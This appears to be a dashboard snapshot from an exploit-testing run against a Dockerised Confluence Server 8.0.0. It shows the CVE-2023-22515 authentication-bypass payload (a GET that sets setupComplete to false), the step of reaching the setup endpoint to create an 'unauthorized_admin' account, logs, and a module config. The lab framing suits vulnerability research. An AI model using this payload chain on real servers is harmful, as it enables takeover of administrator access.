RUN-2023-1045 Analysis In Progress
Execution Timeline
Environment Provisioning
10:42:05
Docker container `atlassian/confluence-server:8.0.0` started successfully on port 8090.
Network Reachability Check
10:42:35
Target responding to HTTP GET / with 200 OK. Latency 12ms.
Vulnerability Identification
10:42:38
Detected version 8.0.0 (match). Initial check: /server-info.action is accessible.
Exploit Execution (Stage 1)
Running...
Sending modified XWork action request to bypass authentication middleware...
Admin Account Creation
Pending
Attack Plan & Reasoning
Strategy
The attack leverages an improperly handled parameter in the XWork action configuration. By manipulating the bootstrapStatusProvider.applicationConfig.setupComplete parameter, we can trick the application into thinking setup is incomplete.
Success Criteria
1. HTTP 200 Response on payload delivery.
2. Access to /setup/setupadministrator-start.action without auth.
3. Successful creation of user 'unauthorized_admin'.
Payload Structure
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
Live Log Viewer
2023-10-27 10:42:05 [INFO] Initializing experiment controller...
2023-10-27 10:42:12 [INFO] Pulling image atlassian/confluence-server:8.0.0
2023-10-27 10:42:35 [INFO] Container started. ID: a1b2c3d4e5f6
2023-10-27 10:42:40 [WARN] Response delay detected (1500ms). Retrying health check.
2023-10-27 10:42:42 [INFO] Target is healthy. Starting exploit chain.
2023-10-27 10:42:45 [INFO] Sending Stage 1 Payload: GET /server-info.action...
Evidence Explorer
full_report.pdf
screenshot_01.png
http_dump.har
docker-compose.yml
db_snapshot.sql
Raw Data Panels
"run_config": {
  "target": "192.168.1.105",
  "port": 8090,
  "exploit_module": "exploit/multi/http/confluence_auth_bypass",
  "parameters": {
    "RHOSTS": "192.168.1.105",
    "RPORT": 8090
  }
}
Sources & Fix Topics
Broken Access Control
Privilege Escalation
Java
Struts2
Official Advisory: Atlassian Security Advisory 2023-10-04
NVD Entry: CVE-2023-22515